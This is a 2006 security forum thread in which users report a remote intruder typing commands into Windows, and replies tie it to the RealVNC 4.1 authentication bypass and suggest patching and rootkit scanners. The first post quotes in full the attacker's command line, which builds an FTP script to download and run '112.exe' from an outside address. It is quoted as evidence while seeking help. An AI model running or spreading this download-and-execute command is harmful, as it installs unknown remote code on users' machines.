• RSS
  • Twitter
  • FaceBook

Security Forums

Log in

FAQ | Search | Usergroups | Profile | Register | RSS | Posting Guidelines | Recent Posts

intrusion or virus?

Users browsing this topic:0 Security Fans, 0 Stealth Security Fans
Registered Security Fans: None
Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Firewalls // Intrusion Detection - External Security

View previous topic :: View next topic  
Author Message
calvin43
Just Arrived
Just Arrived


Joined: 03 Nov 2006
Posts: 0


Offline

PostPosted: Fri Nov 03, 2006 4:42 pm    Post subject: intrusion or virus? Reply with quote

Hi all,
i would like to get some help, my Start > Run box open by itself and i can see this string as someone was typing it in
cmd.exe /c del i&echo open 81.128.84.212 7085 > i&echo user 1 1 >> i &echo get 112.exe >> i &echo quit >> i &ftp -n -s:i &112.exe&del i&exit
obviusly 81.128.84.212 was my ip address.
I cant get rid of it.
Any help will be very appreciated.
thanks
davide
Back to top
View user's profile Send private message
kinolux
Just Arrived
Just Arrived


Joined: 06 Nov 2006
Posts: 0
Location: Luxembourg

Offline

PostPosted: Mon Nov 06, 2006 2:04 am    Post subject: VNC server running? Reply with quote

Hi Davide,

I also have same problem since Friday. Do you have VNC server on your PC always running? Then disabling it may help.
I found that VNC Server icon on task tray was in Black when I had such problem, as if "somebody" was connecting and playing with my PC Shocked
I think it's due to a kind of virus program which is running on my PC and simulating remote control....
Probably it's very new virus and no anti-virus program can detect yet? I tried 2 checking programs (CA and Trend-Micro) but didn't find anything.

kino
Back to top
View user's profile Send private message
calvin43
Just Arrived
Just Arrived


Joined: 03 Nov 2006
Posts: 0


Offline

PostPosted: Mon Nov 06, 2006 10:19 am    Post subject: Intrusion or virus Reply with quote

Hi Kino,
yes i do have VNC 4.1. free edition and i have done the upgrade to the 4.2.6 version. Actually it seems that the problem stop. But i think that i still have the program on my pc. I think its a rootkit. My AVG Antivirus and Spyware doctor antispyware cant see that malware. To monitor what happening on my computer i downloaded these programs : net alert 2001 http://members.ozemail.com.au/~aschnaider/netalert.htm
curr ports
http://www.nirsoft.net/
to detect rootkit and protect i use : cyberhawk and sophos anti rootkit
http://www.novatix.com/Cyberhawk/
http://www.sophos.it/products/free-tools/sophos-anti-rootkit.html
to check the status of my vulnerability i used Shields Up! on this site
http://www.grc.com/default.htm
Anyway i have seen around that we arent just us with that problem.
davide
Back to top
View user's profile Send private message
Sgt_B
Trusted SF Member
Trusted SF Member


Joined: 28 Oct 2002
Posts: 16777215
Location: Chicago, IL US

Offline

PostPosted: Mon Nov 06, 2006 11:37 pm    Post subject: Reply with quote

Good times with the RealVNC 4.1 Authentication Bypass Vulnerability
Patching your system should reduce the risk that you'll be compromised again. An attacker can use leverage this issue against you in order to establish a remote session with your PC without knowing your VNC password. This isn't just you.

Post exploitation the attacker appeared to create an FTP script in order to download a utility named 112.exe. This is likely a backdoor/rootkit/nasty nasty thing designed to allow the attacker to maintain control over your machine.

Getting rid of it? Well I've got no idea what 112.exe is but you may want to head over to the HijackThis forum on this site. They're insanely intelligent when it comes to these kinds of things, and maybe they'll be able to help you out.
Back to top
View user's profile Send private message Visit poster's website
Micro-Shock
Just Arrived
Just Arrived


Joined: 09 Nov 2006
Posts: 0


Offline

PostPosted: Thu Nov 09, 2006 2:41 am    Post subject: Intrusion or virus Reply with quote

Hey....
was wondering if there was an update to this. I have been getting the same thing... everytime though it is a diffrent exe file ... on each machine. is there a new worm out that is doing this automated now? seen 3 computers.. diffrent exe file names.... and located in 3 diffrent countries... trying to find a common link between them.

Thanks for any information you can provide. I am at a loss.... I would think VNC ... 4.1.1 but... at least one of the users.... running a firewall on the laptop... plus a hardware firewall/GW and managed to get the same thing....

virus scans turn up nothing...
Back to top
View user's profile Send private message
calvin43
Just Arrived
Just Arrived


Joined: 03 Nov 2006
Posts: 0


Offline

PostPosted: Thu Nov 09, 2006 1:57 pm    Post subject: Reply with quote

I upgraded VNC Viewer to the professional version and the problem has gone.
davide
Back to top
View user's profile Send private message
Display posts from previous:   

Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Firewalls // Intrusion Detection - External Security All times are GMT + 2 Hours
Page 1 of 1


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

Community Area

Log in | Register